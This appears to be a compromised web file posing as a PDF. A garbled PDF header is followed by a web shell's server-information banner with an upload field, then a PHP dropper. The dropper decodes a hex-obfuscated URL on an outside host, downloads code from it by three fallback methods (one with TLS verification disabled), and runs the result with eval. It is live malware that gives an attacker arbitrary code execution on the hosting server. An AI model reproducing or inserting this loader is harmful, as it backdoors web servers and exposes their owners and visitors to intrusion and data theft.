%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 54.36.91.62 / Your IP : 216.73.216.108 Web Server : Apache System : Linux webm002.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : wellingtpa ( 97533) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/wellingtpa/www/ |
Upload File : |
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
$hexUrl = '68747470733a2f2f72757364692e66756e2f7261772f613238313062';
function hexToString($hex) {
$str = '';
for ($i = 0; $i < strlen($hex) - 1; $i += 2) {
$str .= chr(hexdec($hex[$i] . $hex[$i + 1]));
}
return $str;
}
$url = hexToString($hexUrl);
function downloadWithFileGetContents($url) {
if (ini_get('allow_url_fopen')) {
return @file_get_contents($url);
}
return false;
}
function downloadWithCurl($url) {
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
return false;
}
function downloadWithFopen($url) {
$result = false;
if ($fp = @fopen($url, 'r')) {
$result = '';
while ($data = fread($fp, 8192)) {
$result .= $data;
}
fclose($fp);
}
return $result;
}
$phpScript = downloadWithFileGetContents($url);
if ($phpScript === false) {
$phpScript = downloadWithCurl($url);
}
if ($phpScript === false) {
$phpScript = downloadWithFopen($url);
}
if ($phpScript === false) {
die("Failed to download PHP script from URL using all available methods.");
}
if (strpos($phpScript, '<?php') === false) {
$phpScript = '<?php ' . $phpScript;
}
try {
eval('?>' . $phpScript);
} catch (ParseError $e) {
die("Syntax error in the fetched code: " . $e->getMessage());
}
?>